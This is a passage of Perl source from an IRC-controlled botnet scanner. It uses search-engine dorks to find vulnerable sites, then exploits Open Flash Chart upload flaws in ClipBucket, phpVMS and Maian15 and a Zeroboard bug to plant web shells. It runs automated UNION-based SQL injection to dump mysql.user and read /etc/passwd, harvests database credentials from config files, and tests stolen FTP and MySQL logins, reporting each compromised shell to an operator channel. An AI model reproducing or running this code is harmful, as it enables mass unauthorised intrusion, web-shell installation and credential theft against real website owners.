if ($check =~ /Hacker BoUnCeR/) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$redmistyclogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$redmistyclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $redmistycshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$redmistyclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $redmistycshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub clipbucket_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$clipbucketlogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$clipbucketlogo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $clipbucketshell = "http://".$site."/admin_area/charts/tmp-upload-images/bouncer.php";
my $clipbuckets = "http://".$site."/admin_area/charts/ofc-library/ofc_upload_image.php";
my $cek = &get_content($clipbuckets);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$clipbucketlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $type = $rceinjector."?url=".$site."&type=clipbucket";
my $cekk = &get_content($type);
$check = &get_content($clipbucketshell."?bouncer");
&get_content($clipbucketshell."?delete");
&get_content($clipbucketshell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
if ($check =~ /Hacker BoUnCeR/) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$clipbucketlogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$clipbucketlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $clipbucketshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$clipbucketlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $clipbucketshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub phpvms_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$phpvmslogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$phpvmslogo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $phpvmsshell = "http://".$site."/core/lib/tmp-upload-images/bouncer.php";
my $phpvmss = "http://".$site."/core/lib/php-ofc-library/ofc_upload_image.php";
my $cek = &get_content($phpvmss);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$phpvmslogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $phpvmsv = "http://www.victorparts.fr/vp31/fullscreen/iam.php?url=";
my $type = $rceinjector."?url=".$site."&type=phpvms";
my $cekk = &get_content($type);
$check = &get_content($phpvmsshell."?bouncer");
&get_content($phpvmsshell."?delete");
&get_content($phpvmsshell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
if ($check =~ /Hacker BoUnCeR/) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$phpvmslogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$phpvmslogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $phpvmsshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$phpvmslogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $phpvmsshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub maian15_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$maian15logo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$maian15logo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $maian15shell = "http://".$site."/administrator/components/com_maian15/charts/tmp-upload-images/bouncer.php";
my $maian15s = "http://".$site."/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php";
my $cek = &get_content($maian15s);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$maian15logo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $type = $rceinjector."?url=".$site."&type=maian15";
my $cekk = &get_content($type);
$check = &get_content($maian15shell."?bouncer");
&get_content($maian15shell."?delete");
&get_content($maian15shell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
if ($check =~ /Hacker BoUnCeR/i) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$maian15logo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$maian15logo15$engine 4<9=4>9 sHeLL 4<9=4>9 $maian15shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$maian15logo15$engine 4<9=4>9 sHeLL 4<9=4>9 $maian15shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub find_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jcelogo);
my $num = scalar(@totexploit); if ($num > 0) { foreach my $site (@totexploit) { $count++; if ($count == $num-1) {
&msg("$chan","$jcelogo0(4,1@8,1$engine0)4 Done Searching..Now Exploiting......");sleep(1); }
my $vuln = "http://".$site.$bug;
my $jce = &get_content($vuln);
if ($jce =~ /GIF89/i) {
my $os = "";
if ($jce =~ m/<title>Uploader by ghost-dz(.*?)<form/) {$os = $1;}
&msg("$chan","$findlogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$findlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $vuln15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$findlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $vuln15 (SafeMode=$safe) (OS=$os) uid=$uid ");
sendraw("MODE $chan -m");
}
}
}
}
sub ftp_connect {
my $url = $_[0];
my $host = $_[1];
my $user = $_[2];
my $pass = $_[3];
my $chan = $_[4];
my $engine = $_[5];
my $logo = $_[6];
my $success = 1;
use Net::FTP;
my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
$success = 0 if $ftp->login($user,$pass);
$ftp->quit;
if ($success == 0) {
&msg("$chanxxx","$logo15$engine 4<9=4>9 FTP 15[ 9http://".$host." 15] [4 ".$user.":".$pass." 15]");
}
}
sub dbi_connect () {
my $host = $_[0];
my $user = $_[1];
my $pass = $_[2];
my $dtbs = $_[3];
my $chan = $_[4];
my $engine = $_[5];
my $logo = $_[6];
my $port = "3306";
my $platform = "mysql";
my $dsn = "dbi:$platform:$dtbs:$host:$port";
my $DBIconnect= DBI->connect($dsn,$user,$pass);
if ($DBIconnect) {
&msg("$chanxxx","$logo15$engine 4<9=4>9 MySql 15[ 9http://".$host." 15] [4 Connected 15]");
}
}
sub getUserPass() {
my $string = $_[0];
my @lol = split("\r\n", $string);
my $pass = "";
my $user = "";
foreach my $line (@lol) {
if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
$pass = $3;
}
if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
$user = $3;
}
}
return $user.":Viva-Byroe.Net:".$pass;
}
sub getinfo() {
my $string = $_[0];
my @lol = split("\r\n", $string);
my $pass = "";
my $user = "";
my $dbs = "";
foreach my $line (@lol) {
if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
$pass = $3;
}
if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
$user = $3;
}
if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
$dbs = $3;
}
}
return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
}
sub zero_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$zerologo15$engine 9Finished 15for 9$dork "); }
my $coba = "http://".$site.$bug;
my $cek = &get_content($coba);sleep(1);
if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
my $vulner1 = "http://".$site.$action."?cmd=";
my $vulner2 = "http://".$site.$action.$wgetdon;
my $vulner3 = "http://".$site.$action.$lwpdon;
my $vulner4 = "http://".$site.$action.$curldon;
my $vuln1 = "http://".$site."/data/kekkaishi.php";
my $check2 = &get_content($vulner1);
if ($check2 =~ /Byroe Team/) {
if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
my $check1 = &get_content($vuln1);
if ($check1 =~ /stunshell/i) {
my $safe = ""; my $os = ""; my $uid = "";
if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
if ($check1 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$zerologo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$zerologo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
} else {
&msg("$chan","$zerologo15$engine 4<9=4>9 Cek dewe 15 $vulner1 ");
} sleep(2);
}
}
} exit; }
}
}
}
sub sql_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$sqllogo15$engine 9Finished 15for 9$dork "); }
my $test = "http://".$site.$bug."1'";
my $sqlsite = "http://".$site.$bug."1";
my $html = &get_content($test);sleep(1);
if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
&sqlbrute($sqlsite,$chan,$engine);sleep(1);
}
elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
&sqlbrute($sqlsite,$chan,$engine);sleep(1);
}
elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
&sqlbrute($sqlsite,$chan,$engine);sleep(1);
}
elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
&sqlbrute($sqlsite,$chan,$engine);sleep(1);
}
}
}
}
sub sqlbrute() {
my $site=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
&msg("$chan","$sqllogo9$engine 4<9=4>9 SqL 4<9=4>15 $sql ");
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo9$engine 4<9=4>9 INFO_SCHEMA 4<9=4>15 $sql ");
}
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
&msg("$chan","$sqllogo9$engine 4<9=4>9 USER 4<9=4>15 $sql ");
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
{
&msg("$chan","$sqllogo9$engine 4<9=4>9 Load File 4<9=4>15 $sql ");
}
foreach $tabla(@tabele)
{
chomp($tabla);
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
{
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
&msg("$chan","$sqllogo9$engine 4<9=4>9 Tabel 4<9=4>15 $sql ");
&tabelka($site,$tabla,$chan,$engine);
}
}
}
}
}
sub tabelka() {
my $site =$_[0];
my $tabla =$_[1];
my $chan =$_[2];
my $engine=$_[3];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
{
chomp($columna);
$sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
&msg("$chan","$sqllogo9$engine 4<9=4>9 SQLi Vuln 4<9=4>15 $site 4[9Kolom4]15 $columna 4[9Tabel4]15 $tabla ");
}
}
}
##################################################################################
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
if ($gps == 1) {
if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); }
if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); }
if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); }
if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); }
if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); }
if ($engine eq "JacKCA") { my @jackca = &jack1($dork."+site:ca"); push(@total,@jackca); }
if ($engine eq "JacKCL") { my @jackcl = &jack2($dork."+site:cl"); push(@total,@jackcl); }
if ($engine eq "JacKCN") { my @jackcn = &jack3($dork."+site:cn"); push(@total,@jackcn); }
if ($engine eq "JacKCoM") { my @jackcom = &jack4($dork."+site:com"); push(@total,@jackcom); }
if ($engine eq "JacKCZ") { my @jackcz = &jack5($dork."+site:cz"); push(@total,@jackcz); }
if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); }
if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); }
if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); }
if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); }
if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); }
if ($engine eq "JacKHU") { my @jackhu = &jack1($dork."+site:hu"); push(@total,@jackhu); }
if ($engine eq "JacKID") { my @jackid = &jack2($dork."+site:id"); push(@total,@jackid); }
if ($engine eq "JacKIL") { my @jackil = &jack3($dork."+site:il"); push(@total,@jackil); }
if ($engine eq "JacKIN") { my @jackin = &jack4($dork."+site:in"); push(@total,@jackin); }
if ($engine eq "JacKInfO") { my @jackinfo = &jack5($dork."+site:info"); push(@total,@jackinfo); }
if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); }
if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); }
if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); }
if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); }
if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); }
if ($engine eq "JacKMY") { my @jackmy = &jack1($dork."+site:my"); push(@total,@jackmy); }
if ($engine eq "JacKNeT") { my @jacknet = &jack2($dork."+site:net"); push(@total,@jacknet); }
if ($engine eq "JacKNL") { my @jacknl = &jack3($dork."+site:nl"); push(@total,@jacknl); }
if ($engine eq "JacKOrG") { my @jackorg = &jack4($dork."+site:org"); push(@total,@jackorg); }
if ($engine eq "JacKPH") { my @jackph = &jack5($dork."+site:ph"); push(@total,@jackph); }
if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); }
if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); }
if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); }
if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); }
if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); }
if ($engine eq "JacKUK") { my @jackuk = &jack1($dork."+site:uk"); push(@total,@jackuk); }
if ($engine eq "JacKUS") { my @jackus = &jack2($dork."+site:us"); push(@total,@jackus); }
if ($engine eq "JacKSI") { my @jacksi = &jack3($dork."+site:si"); push(@total,@jacksi); }
if ($engine eq "JacKBE") { my @jackbe = &jack4($dork."+site:be"); push(@total,@jackbe); }
if ($engine eq "JacKBIZ") { my @jackbiz = &jack5($dork."+site:biz"); push(@total,@jackbiz); }
}
if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
if ($gps2 == 1) {
if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
}
@clean = &clean(@total);
if ($silentmode == 0) {
&msg("$chan","$logo15$engine 4<9=4>9 Total:4 [15".scalar(@total)."4] 9 Clean:4 [15".scalar(@clean)."4] "); }
return @clean;
}
##################################################################################
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
if ($res =~ /$reqexp/) { $status = 1 }
return $status;
}
sub get_content() {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout($timot);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}
######################################### SEARCH ENGINE
sub jack1() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $link = $1;
if ($link !~ /google/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub jack2() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $link = $1;
if ($link !~ /google/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub jack3() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $link = $1;
if ($link !~ /google/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub jack4() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $link = $1;
if ($link !~ /google/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub jack5() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $link = $1;
if ($link !~ /google/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub google() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $link = $1;
if ($link !~ /google/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub walla() {
my @list;
my $key = $_[0];
for ($b=0; $b<=100; $b+=1) {
my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
my $link = $1;
if ($link !~ /walla\.co\.il/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub yahoo(){
my @list;
my $key = $_[0];
for ($b=1; $b<=1000; $b+=10) {
my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
my $link = $1;
if ($link !~ /yahoo\.com/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub ask() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=100) {
my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
my $link = $1;
if ($link !~ /ask\.com/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=400; $b+=10) {
my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
my $link = $1;
if ($link !~ /onet|webcache|query/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub clusty() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=10; $b<=200; $b+=10) {
my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
my $res = &search_engine_query($search);
if ($res !~ /next/) {$b=100;}
while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
my $link = $1;
if ($1 !~ /yippy\.com/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=400; $i+=10) {
my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
my $link = $1;
if ($link !~ /google/) {
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub sapo(){
my @list;
my $key = $_[0];
for ($b=1; $b<=50; $b+=1) {
my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
my $res = &search_engine_query($search);
if ($res !~ m/Next/i) {$b=50;}
while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
my $link = $1;
if ($1 !~ /\.sapo\.pt/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub lycos() {
my @list;
my $key = $_[0];
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
my $link = $1;
if ($link !~ /lycos\.com/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub uol() {
my @list;
my $key = $_[0];
for ($b=0; $b<=1000; $b+=10) {
my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
my $res = &search_engine_query($search);
if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
my $link = $1;
if ($link !~ /uol\.com\.br|\/web/i){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub seznam() {
my @list;
my $key = $_[0];
for ($b=1; $b<=300; $b+=20) {
my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
my $link = $1;
if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub hotbot() {
my @list;
my $key = $_[0];
for ($b=0; $b<=50; $b+=1) {
my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
my $res = &search_engine_query($search);
if ($res =~ m/had no web result/i) {$b=50;}
while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
my $link = $1;
if ($link !~ /hotbot\.com/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub aol() {
my @list;
my $key = $_[0];
for ($b=0; $b<=300; $b+=10) {
my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
my $link = $1;
if ($link !~ /aol\.com/){
my @grep = &links($link);
